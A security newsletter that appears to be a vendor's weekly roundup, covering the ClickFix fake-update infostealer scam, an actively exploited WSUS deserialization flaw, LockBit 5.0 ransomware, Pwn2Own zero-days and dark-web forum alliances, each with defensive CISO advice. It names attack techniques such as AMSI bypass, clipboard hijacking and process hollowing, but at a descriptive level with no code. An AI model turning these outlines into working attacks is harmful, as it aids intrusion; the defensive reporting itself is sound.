This week saw high-impact technical threats: WSUS servers actively exploited, LockBit ransomware’s upgraded return, dozens of new zero-days unveiled at Pwn2Own Ireland, advanced social engineering campaigns (ClickFix), and major underground coordination—each demanding proactive CISO action.
>>Outpace Attackers With AI-Based Automated Penetration Testing
New Hacking Techniques
ClickFix Fullscreen Update Scam (Oct 27)
Attackers deploy a convincing fullscreen Windows update screen, leveraging CAPTCHAs and clipboard hijacking. Victims unknowingly paste a PowerShell infostealer (“Radamanthis”) into the Run dialog. Payloads use AMSI bypass, RC4 encryption, and scheduled tasks for persistence. Exploits browser process spawning (chrome.exe → powershell.exe) for evasion.
CISO Takeaway
Restrict PowerShell to signed scripts, disable Windows Run dialog for users, and monitor PowerShell invoked by browsers.
Critical Attack Techniques & CVEs
- CVE-2025-59287: WSUS RCE
(Out-of-band patch: Oct 23, 2025, CVSS 9.8)
Unauthenticated remote code execution via unsafe deserialization in WSUS SOAP/ReportingWebService endpoints. Attackers exploit binaryFormatters with AES-128-CBC and zero IV, SYSTEM-level access, and immediate public PoC weaponization.
CISO Takeaway
Patch now, remove WSUS interfaces from internet, hunt for powershell.exe/cmd.exe child processes from wsusservice.exe, segment WSUS VLANs.
- LockBit 5.0 Ransomware (Oct 22–23)
LockBit returns with ESXi/Linux/Windows support, randomized file extensions, anti-analysis, and advanced encryption (ChaCha20+RSA). Affiliates use defrag.exe for process hollowing, enhanced self-spread, and aggressive double-extortion tactics.
CISO Takeaway
Harden hypervisor/ESXi, validate backup restores (including cloud), EDR for defrag.exe, Rclone events, and enforce MFA.
- Pwn2Own Ireland 2025 (Oct 21–23)
Researchers demonstrated 73 zero-days (via USB, NFC, network) in iPhone 16, Galaxy S25, QNAP/Synology NAS, smart home/IoT, WhatsApp (zero-click RCE disclosed privately).
CISO Takeaway
Expedite patching for Pwn2Own targets, isolate at-risk devices, disable USB/NFC where possible, and track ZDI advisories.
Darkweb Threats and Underground Chatter
Ransomware Forums Consolidation & “Trinity of Chaos”
XSS, RAMP, Dread, and emerging DarkForums host LockBit affiliate recruitment, credential dumps, and data leak auctions. Alliance: ShinyHunters, LAPSUS$, Scattered Spider merge to deploy a megaleak site and combine SQLi, vishing, MFA fatigue, and insider tactics.
Telegram-first data marketplaces spike, AI-driven phishing and malware kits spread.
CISO Takeaway
Deploy darkweb monitoring, verify vendor exposures, enforce credential hygiene/MFA, and monitor for supply chain mentions.
Outpace Attackers With AI-Based Automate Penetration Testing With FireCompass:
FireCompass is a single platform for AI-Powered Continuous Automated Red Teaming (CART), Pen Testing & NextGen Attack Surface Management
Related Posts:
